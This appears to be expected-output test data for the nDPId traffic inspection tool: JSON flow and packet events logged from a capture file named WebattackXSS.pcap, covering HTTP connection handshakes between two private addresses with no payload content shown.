+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347301520,"flow_last_seen":1499347306702,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347435021,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55740,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347301520,"flow_last_seen":1499347306702,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347435021,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55740,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347304125,"flow_last_seen":1499347309703,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347435021,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55766,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347304125,"flow_last_seen":1499347309703,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347435021,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55766,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347305402,"flow_last_seen":1499347310703,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347435021,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55780,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347305402,"flow_last_seen":1499347310703,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347435021,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55780,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347306680,"flow_last_seen":1499347311703,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347435021,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55794,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347306680,"flow_last_seen":1499347311703,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347435021,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55794,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347309314,"flow_last_seen":1499347314704,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347435021,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55820,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347309314,"flow_last_seen":1499347314704,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347435021,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55820,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3904,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347436274,"flow_last_seen":1499347436274,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347436274,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57170,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3904,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":275,"flow_packet_id":1,"flow_last_seen":1499347436274,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347436274,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8W69AAD4GaiGsEAABwKgKMt9SAFA\/BeonAAAAAKACchCjcQAAAgQFtAQCCAoBOrGIAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3906,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":275,"flow_packet_id":2,"flow_last_seen":1499347436274,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347436274,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ31ICI0S7PwXqKKAScSDWjwAAAgQFtAQCCAoD5IL+ATqxiAEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3907,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":275,"flow_packet_id":3,"flow_last_seen":1499347436274,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347436274,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0W7BAAD4GaiisEAABwKgKMt9SAFA\/BeooAiNEvIAQAOV1lwAAAQEICgE6sYgD5IL+"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3916,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347437541,"flow_last_seen":1499347437541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347437541,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57184,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3916,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":276,"flow_packet_id":1,"flow_last_seen":1499347437541,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347437541,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80SpAAD4G9KWsEAABwKgKMt9gAFCd2mPvAAAAAKACchDJiQAAAgQFtAQCCAoBOrLFAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3917,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":276,"flow_packet_id":2,"flow_last_seen":1499347437541,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347437541,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ32BqH6Tbndpj8KAScSAzTwAAAgQFtAQCCAoD5IQ6ATqyxQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3918,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":276,"flow_packet_id":3,"flow_last_seen":1499347437542,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347437542,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00StAAD4G9KysEAABwKgKMt9gAFCd2mPwah+k3IAQAOXSVgAAAQEICgE6ssUD5IQ6"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3937,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347440119,"flow_last_seen":1499347440119,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347440119,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57210,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3937,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":277,"flow_packet_id":1,"flow_last_seen":1499347440119,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347440119,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Op5AAD4GizKsEAABwKgKMt96AFDbdo\/XAAAAAKACchBdZwAAAgQFtAQCCAoBOrVJAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3938,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":277,"flow_packet_id":2,"flow_last_seen":1499347440120,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347440120,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ33qAsDTj23aP2KAScSAeDwAAAgQFtAQCCAoD5Ia\/ATq1SQEDAwc="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3939,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":277,"flow_packet_id":3,"flow_last_seen":1499347440120,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347440120,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Op9AAD4GizmsEAABwKgKMt96AFDbdo\/YgLA05IAQAOW9FQAAAQEICgE6tUoD5Ia\/"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3946,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347441364,"flow_last_seen":1499347441364,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347441364,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57224,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3946,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":278,"flow_packet_id":1,"flow_last_seen":1499347441364,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347441364,"pkt":"ABm5CmnxAMGxFOsxCABFAAA87qpAAD4G1yWsEAABwKgKMt+IAFCFjlgqAAAAAKACchDptwAAAgQFtAQCCAoBOraAAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3947,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":278,"flow_packet_id":2,"flow_last_seen":1499347441364,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347441364,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ34gRswTRhY5YK6AScSBIOAAAAgQFtAQCCAoD5If2ATq2gAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3948,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":278,"flow_packet_id":3,"flow_last_seen":1499347441365,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347441365,"pkt":"ABm5CmnxAMGxFOsxCABFAAA07qtAAD4G1yysEAABwKgKMt+IAFCFjlgrEbME0oAQAOXnPgAAAQEICgE6toED5If2"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3959,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347442626,"flow_last_seen":1499347442626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347442626,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57238,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3959,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":279,"flow_packet_id":1,"flow_last_seen":1499347442626,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347442626,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8WP9AAD4GbNGsEAABwKgKMt+WAFAR1u9DAAAAAKACchDFDAAAAgQFtAQCCAoBOre8AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3960,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":279,"flow_packet_id":2,"flow_last_seen":1499347442626,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347442626,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ35b747kmEdbvRKAScSCDygAAAgQFtAQCCAoD5IkyATq3vAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":279,"flow_packet_id":3,"flow_last_seen":1499347442627,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347442627,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0WQBAAD4GbNisEAABwKgKMt+WAFAR1u9E++O5J4AQAOUi0gAAAQEICgE6t7wD5Iky"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3977,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347445158,"flow_last_seen":1499347445158,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347445158,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57264,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3977,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":280,"flow_packet_id":1,"flow_last_seen":1499347445158,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347445158,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8\/otAAD4Gx0SsEAABwKgKMt+wAFCaOES+AAAAAKACchDknAAAAgQFtAQCCAoBOro1AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3978,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":280,"flow_packet_id":2,"flow_last_seen":1499347445158,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347445158,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ37CiJaNtmjhEv6AScSAQWQAAAgQFtAQCCAoD5IurATq6NQEDAwc="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3979,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":280,"flow_packet_id":3,"flow_last_seen":1499347445159,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347445159,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0\/oxAAD4Gx0usEAABwKgKMt+wAFCaOES\/oiWjboAQAOWvYAAAAQEICgE6ujUD5Iur"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347310567,"flow_last_seen":1499347315705,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347445734,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55834,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347310567,"flow_last_seen":1499347315705,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347445734,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55834,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347313106,"flow_last_seen":1499347318705,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347445734,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55860,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347313106,"flow_last_seen":1499347318705,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347445734,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55860,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347314358,"flow_last_seen":1499347319705,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347445734,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55874,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347314358,"flow_last_seen":1499347319705,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347445734,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55874,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347315631,"flow_last_seen":1499347320705,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347445734,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55888,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347315631,"flow_last_seen":1499347320705,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347445734,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55888,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347318180,"flow_last_seen":1499347323705,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347445734,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55914,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347318180,"flow_last_seen":1499347323705,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347445734,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55914,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347319466,"flow_last_seen":1499347324705,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347445734,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55928,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347319466,"flow_last_seen":1499347324705,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347445734,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55928,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 